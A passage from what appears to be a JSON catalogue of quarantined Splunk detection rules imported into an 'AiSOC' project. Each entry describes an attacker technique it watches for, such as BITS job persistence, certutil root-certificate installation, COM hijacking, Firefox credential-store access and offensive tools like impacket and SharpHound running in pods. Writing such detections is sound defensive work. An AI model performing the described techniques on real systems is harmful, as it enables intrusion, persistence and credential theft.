Endpoint Detection and Response (EDR) data, focusing on specific command-line arguments associated with these tools. This activity is significant because it indicates potential reconnaissance or exploitation attempts targeting AD CS, which could lead to unauthorized access or privilege escalation. If confirmed malicious, attackers could gain insights into the AD CS infrastructure, potentially compromising sensitive certificates and escalating their privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-certify-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e6d2dc61-a8b9-4b03-906c-da0ca75d71b8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_certify_command_line_arguments.yml" } }, { "id": "splunk-security-content-e6f1bb1b-f441-492b-9126-902acda217da", "type": "detection", "name": "Detect S3 access from a new IP", "description": "The following analytic identifies access to an S3 bucket from a new or previously unseen remote IP address. It leverages S3 bucket-access logs, specifically focusing on successful access events (http_status=200). This activity is significant because access from unfamiliar IP addresses could indicate unauthorized access or potential data exfiltration attempts. If confirmed malicious, this activity could lead to unauthorized data access, data theft, or further exploitation of the compromised S3 bucket, posing a significant risk to sensitive information stored within the bucket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-s3-access-from-a-new-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e6f1bb1b-f441-492b-9126-902acda217da", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_s3_access_from_a_new_ip.yml" } }, { "id": "splunk-security-content-e6fc13b0-1609-11ec-b533-acde48001122", "type": "detection", "name": "Non Firefox Process Access Firefox Profile Dir", "description": "The following analytic detects non-Firefox processes accessing the Firefox profile directory, which contains sensitive user data such as login credentials, browsing history, and cookies. It leverages Windows Security Event logs, specifically event code 4663, to monitor access attempts. This activity is significant because it may indicate attempts by malware, such as RATs or trojans, to harvest user information. If confirmed malicious, this behavior could lead to data exfiltration, unauthorized access to user accounts, and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/non-firefox-process-access-firefox-profile-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e6fc13b0-1609-11ec-b533-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/non_firefox_process_access_firefox_profile_dir.yml" } }, { "id": "splunk-security-content-e733a326-59d2-446d-b8db-14a17151aa68", "type": "detection", "name": "Detect Spike in S3 Bucket deletion", "description": "The following analytic identifies a spike in API activity related to the deletion of S3 buckets in your AWS environment. It leverages AWS CloudTrail logs to detect anomalies by comparing current deletion activity against a historical baseline. This activity is significant as unusual spikes in S3 bucket deletions could indicate malicious actions such as data exfiltration or unauthorized data destruction. If confirmed malicious, this could lead to significant data loss, disruption of services, and potential exposure of sensitive information. Immediate investigation is required to determine the legitimacy of the activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-spike-in-s3-bucket-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e733a326-59d2-446d-b8db-14a17151aa68", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_spike_in_s3_bucket_deletion.yml" } }, { "id": "splunk-security-content-e776d06c-9267-11eb-819b-acde48001122", "type": "detection", "name": "AWS IAM Successful Group Deletion", "description": "The following analytic identifies the successful deletion of an IAM group in AWS. It leverages CloudTrail logs to detect `DeleteGroup` events with a success status. This activity is significant as it could indicate potential changes in user permissions or access controls, which may be a precursor to further unauthorized actions. If confirmed malicious, an attacker could disrupt access management, potentially leading to privilege escalation or unauthorized access to sensitive resources. Analysts should review related IAM events, such as recent user additions or new group creations, to assess the broader context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.003", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-successful-group-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e776d06c-9267-11eb-819b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_successful_group_deletion.yml" } }, { "id": "splunk-security-content-e78a1037-4548-4072-bb1b-ad99ae416426", "type": "detection", "name": "O365 High Privilege Role Granted", "description": "The following analytic detects when high-privilege roles such as \"Exchange Administrator,\" \"SharePoint Administrator,\" or \"Global Administrator\" are granted within Office 365. It leverages O365 audit logs to identify events where these roles are assigned to any user or service account. This activity is significant for SOCs as these roles provide extensive permissions, allowing broad access and control over critical resources and data. If confirmed malicious, this could enable attackers to gain significant control over O365 resources, access, modify, or delete critical data, and compromise the overall security and functionality of the O365 environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-high-privilege-role-granted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e78a1037-4548-4072-bb1b-ad99ae416426", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_high_privilege_role_granted.yml" } }, { "id": "splunk-security-content-e7a96937-3b58-4962-8dce-538e4763cf15", "type": "detection", "name": "Linux Unix Shell Enable All SysRq Functions", "description": "The following analytic detects the execution of a command to enable all SysRq functions on a Linux system, a technique associated with the AwfulShred malware. It leverages Endpoint Detection and Response (EDR) data to identify processes executing the command to pipe bitmask '1' to /proc/sys/kernel/sysrq. This activity is significant as it can indicate an attempt to manipulate kernel system requests, which is uncommon and potentially malicious. If confirmed, this could allow an attacker to reboot the system or perform other critical actions, leading to system instability or further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-unix-shell-enable-all-sysrq-functions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e7a96937-3b58-4962-8dce-538e4763cf15", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_unix_shell_enable_all_sysrq_functions.yml" } }, { "id": "splunk-security-content-e7ecc5e0-88df-48b9-91af-51104c68f02f", "type": "detection", "name": "Cloud Provisioning Activity From Previously Unseen City", "description": "The following analytic detects cloud provisioning activities originating from previously unseen cities. It leverages cloud infrastructure logs and compares the geographic location of the source IP address against a baseline of known locations. This activity is significant as it may indicate unauthorized access or misuse of cloud resources from an unexpected location. If confirmed malicious, this could lead to unauthorized resource creation, potential data exfiltration, or further compromise of cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-provisioning-activity-from-previously-unseen-city.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e7ecc5e0-88df-48b9-91af-51104c68f02f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_provisioning_activity_from_previously_unseen_city.yml" } }, { "id": "splunk-security-content-e84b3c74-f742-11ee-9f6e-acde48001122", "type": "detection", "name": "AWS Bedrock High Number List Foundation Model Failures", "description": "The following analytic identifies an high number of AccessDenied attempts to list AWS Bedrock foundation models. It leverages AWS CloudTrail logs to detect when a user or service experiences multiple failures when calling the ListFoundationModels API. This activity is significant as it may indicate an adversary performing reconnaissance of available AI models after compromising credentials with limited permissions. Repeated failures could suggest brute force attempts to enumerate accessible resources or misconfigured access controls. If confirmed malicious, this could represent early-stage reconnaissance before attempting to access or manipulate Bedrock models or knowledge bases.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-high-number-list-foundation-model-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e84b3c74-f742-11ee-9f6e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_high_number_list_foundation_model_failures.yml" } }, { "id": "splunk-security-content-e8fc95bc-a107-11eb-a978-acde48001122", "type": "detection", "name": "Wermgr Process Spawned CMD Or Powershell Process", "description": "The following analytic detects the spawning of cmd or PowerShell processes by the wermgr.exe process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process telemetry, including parent-child process relationships and command-line executions. This behavior is significant as it is commonly associated with code injection techniques used by malware like TrickBot to execute shellcode or malicious DLL modules. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe threat to system security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wermgr-process-spawned-cmd-or-powershell-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e8fc95bc-a107-11eb-a978-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml" } }, { "id": "splunk-security-content-e91bd102-d630-4e76-ab73-7e3ba22c5961", "type": "detection", "name": "First Time Seen Child Process of Zoom", "description": "The following analytic identifies the first-time execution of child processes spawned by Zoom (zoom.exe or zoom.us). It leverages Endpoint Detection and Response (EDR) data, specifically monitoring process creation events and comparing them against previously seen child processes. This activity is significant because the execution of unfamiliar child processes by Zoom could indicate malicious exploitation or misuse of the application. If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further compromise of the endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/first-time-seen-child-process-of-zoom.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e91bd102-d630-4e76-ab73-7e3ba22c5961", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/first_time_seen_child_process_of_zoom.yml" } }, { "id": "splunk-security-content-e97a5ffe-90bf-11eb-928a-acde48001122", "type": "detection", "name": "BITS Job Persistence", "description": "The following analytic detects the use of `bitsadmin.exe` to schedule a BITS job for persistence on an endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line parameters such as `create`, `addfile`, and `resume`. This activity is significant because BITS jobs can be used by attackers to maintain persistence, download malicious payloads, or exfiltrate data. If confirmed malicious, this could allow an attacker to persist in the environment, execute arbitrary code, or transfer sensitive information, necessitating further investigation and potential remediation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/bits-job-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e97a5ffe-90bf-11eb-928a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/bits_job_persistence.yml" } }, { "id": "splunk-security-content-e98944a9-92e4-443c-81b8-a322e33ce75a", "type": "detection", "name": "Azure Runbook Webhook Created", "description": "The following analytic detects the creation of a new Automation Runbook Webhook within an Azure tenant. It leverages Azure Audit events, specifically the \"Create or Update an Azure Automation webhook\" operation, to identify this activity. This behavior is significant because Webhooks can trigger Automation Runbooks via unauthenticated URLs exposed to the Internet, posing a security risk. If confirmed malicious, an attacker could use this to execute code, create users, or maintain persistence within the environment, potentially leading to unauthorized access and control over Azure resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-runbook-webhook-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e98944a9-92e4-443c-81b8-a322e33ce75a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_runbook_webhook_created.yml" } }, { "id": "splunk-security-content-e9926391-ec0c-4bad-8a95-e450dbf6aae4", "type": "detection", "name": "Windows Certutil Root Certificate Addition", "description": "The following analytic detects the use of certutil.exe to add a certificate to the Root certificate store using the \"-addstore\" flag.\nIn this case, the certificate is loaded from a temporary file path (e.g., %TEMP%) or other uncommon locations (e.g. C:\\\\Users\\\\Public\\\\), which is highly suspicious and uncommon in legitimate administrative activity.\nThis behavior may indicate an adversary is installing a malicious root certificate to intercept HTTPS traffic, impersonate trusted entities, or bypass security controls.\nThe use of flags such as -f (force) and -Enterprise, combined with loading .tmp files from user-writable locations, is consistent with post-exploitation activity seen in credential theft and adversary-in-the-middle (AiTM) attacks.\nThis should be investigated immediately, especially if correlated with unauthorized privilege use or prior certificate modifications.\nYou should monitor when new certificates are added to the root store because this store is what your system uses to decide which websites, apps, and software can be trusted.\nIf an attacker manages to add their own certificate there, they can silently intercept encrypted traffic, impersonate trusted websites, or make malicious programs look safe.\nThis means they could steal sensitive data, bypass security tools, and keep access to your system even after other malware is removed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1587.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-certutil-root-certificate-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e9926391-ec0c-4bad-8a95-e450dbf6aae4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_certutil_root_certificate_addition.yml" } }, { "id": "splunk-security-content-e99fcc4f-c6b0-4443-aa2a-e3c85126ec9a", "type": "detection", "name": "Windows Common Abused Cmd Shell Risk Behavior", "description": "The following analytic identifies instances where four or more distinct detection analytics are associated with malicious command line behavior on a specific host. This detection leverages the Command Line Interface (CLI) data from various sources to identify suspicious activities. This behavior is significant as it often indicates attempts to execute malicious commands, access sensitive data, install backdoors, or perform other nefarious actions. If confirmed malicious, attackers could gain unauthorized control, exfiltrate information, escalate privileges, or launch further attacks within the network, leading to severe compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222", "T1049", "T1033", "T1529", "T1016", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-common-abused-cmd-shell-risk-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e99fcc4f-c6b0-4443-aa2a-e3c85126ec9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_common_abused_cmd_shell_risk_behavior.yml" } }, { "id": "splunk-security-content-e9d05aa2-32f0-411b-930c-5b8ca5c4fcee", "type": "detection", "name": "Windows MSIExec Spawn Discovery Command", "description": "The following analytic detects MSIExec spawning multiple discovery commands.\nThis behavior is identified using data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where MSIExec is the parent process.\nIf confirmed malicious, an attacker could use these discovery commands to gather system information, potentially leading to further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-spawn-discovery-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e9d05aa2-32f0-411b-930c-5b8ca5c4fcee", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_spawn_discovery_command.yml" } }, { "id": "splunk-security-content-e9d0b9e6-2f3c-4a8a-9d61-2b6f4a9c1c2e", "type": "detection", "name": "Cisco Isovalent - Pods Running Offensive Tools", "description": "The following analytic detects execution of known offensive tooling from within Kubernetes pods, including network scanners and post-exploitation frameworks (e.g., nmap, masscan, zmap, impacket-*, hashcat, john, SharpHound, kube-hunter, peirates). We have created a macro named `linux_offsec_tool_processes` that contains the list of known offensive tooling found on linux systems. Adversaries commonly introduce these tools into compromised workloads to conduct discovery, lateral movement, credential access, or cluster reconnaissance. This behavior may indicate a compromised container or supply-chain abuse. Extra scrutiny is warranted for namespaces that do not typically run diagnostic scanners and for pods that suddenly begin invoking these binaries outside of normal maintenance activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-pods-running-offensive-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e9d0b9e6-2f3c-4a8a-9d61-2b6f4a9c1c2e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___pods_running_offensive_tools.yml" } }, { "id": "splunk-security-content-ea4e2c41-dbfb-4f5f-a7b6-9ac1b7f104aa", "type": "detection", "name": "O365 Multi-Source Failed Authentications Spike", "description": "The following analytic identifies a spike in failed authentication attempts within an Office 365 environment, indicative of a potential distributed password spraying attack. It leverages UserLoginFailed events from O365 Management Activity logs, focusing on ErrorNumber 50126. This detection is significant as it highlights attempts to bypass security controls using multiple IP addresses and user agents. If confirmed malicious, this activity could lead to unauthorized access, data breaches, privilege escalation, and lateral movement within the organization. Early detection is crucial to prevent account takeovers and mitigate subsequent threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multi-source-failed-authentications-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea4e2c41-dbfb-4f5f-a7b6-9ac1b7f104aa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multi_source_failed_authentications_spike.yml" } }, { "id": "splunk-security-content-ea61e291-af05-4716-932a-67faddb6ae6f", "type": "detection", "name": "Powershell COM Hijacking InprocServer32 Modification", "description": "The following analytic detects attempts to modify or add a Component Object Model (COM) entry to the InProcServer32 path within the registry using PowerShell. It leverages PowerShell ScriptBlock Logging (EventCode 4104) to identify suspicious script blocks that target the InProcServer32 registry path. This activity is significant because modifying COM objects can be used for persistence or privilege escalation by attackers. If confirmed malicious, this could allow an attacker to execute arbitrary code or maintain persistent access to the compromised system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-com-hijacking-inprocserver32-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea61e291-af05-4716-932a-67faddb6ae6f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_com_hijacking_inprocserver32_modification.yml" } }, { "id": "splunk-security-content-ea688274-9c06-4473-b951-e4cb7a5d7a45", "type": "detection", "name": "TOR Traffic", "description": "The following analytic identifies allowed network traffic to The Onion Router (TOR), an anonymity network often exploited for malicious activities.\nIt leverages data from Next Generation Firewalls, using the Network_Traffic data model to detect traffic where the application is TOR and the action is allowed.\nThis activity is significant as TOR can be used to bypass conventional monitoring, facilitating hacking, data breaches, and illicit content dissemination.\nIf confirmed malicious, this could lead to unauthorized access, data exfiltration, and severe compliance violations, compromising the integrity and security of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/tor-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea688274-9c06-4473-b951-e4cb7a5d7a45", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/tor_traffic.yml" } }, { "id": "splunk-security-content-ea73128a-43ab-11ec-9753-acde48001122", "type": "detection", "name": "CSC Net On The Fly Compilation", "description": "The following analytic detects the use of the .NET compiler csc.exe for on-the-fly compilation of potentially malicious .NET code. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns associated with csc.exe. This activity is significant because adversaries and malware often use this technique to evade detection by compiling malicious code at runtime. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/csc-net-on-the-fly-compilation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea73128a-43ab-11ec-9753-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/csc_net_on_the_fly_compilation.yml" } }, { "id": "splunk-security-content-ea91651a-772a-4b02-ac3d-985b364a5f07", "type": "detection", "name": "Windows Known Abused DLL Created", "description": "The following analytic identifies the creation of Dynamic Link Libraries (DLLs) with a known history of exploitation in atypical locations. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and filesystem events. This activity is significant as it may indicate DLL search order hijacking or sideloading, techniques used by attackers to execute arbitrary code, maintain persistence, or escalate privileges. If confirmed malicious, this activity could allow attackers to blend in with legitimate operations, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-known-abused-dll-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea91651a-772a-4b02-ac3d-985b364a5f07", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_known_abused_dll_created.yml" } }, { "id": "splunk-security-content-eabbac3a-45aa-4659-920f-6b8cff383fb8", "type": "detection", "name": "Windows Registry BootExecute Modification", "description": "The following analytic detects modifications to the BootExecute registry key, which manages applications and services executed during system boot. It leverages data from the Endpoint.Registry data model, focusing on changes to the registry path \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\BootExecute\". This activity is significant because unauthorized changes to this key can indicate attempts to achieve persistence, load malicious code, or tamper with the boot process. If confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary code at boot, or disrupt system operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1542", "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-bootexecute-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eabbac3a-45aa-4659-920f-6b8cff383fb8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_bootexecute_modification.yml" } }, { "id": "splunk-security-content-eac4de87-7a56-4538-a21b-277897af6d8d", "type": "detection", "name": "Azure AD Application Administrator Role Assigned", "description": "The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. It leverages Azure Active Directory events, specifically monitoring the \"Add member to role\" operation. This activity is significant because users in this role can manage all aspects of enterprise applications, including credentials, which can be used to impersonate application identities. If confirmed malicious, an attacker could escalate privileges, manage application settings, and potentially access sensitive resources by impersonating application identities, posing a significant security risk to the Azure AD tenant.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-application-administrator-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": 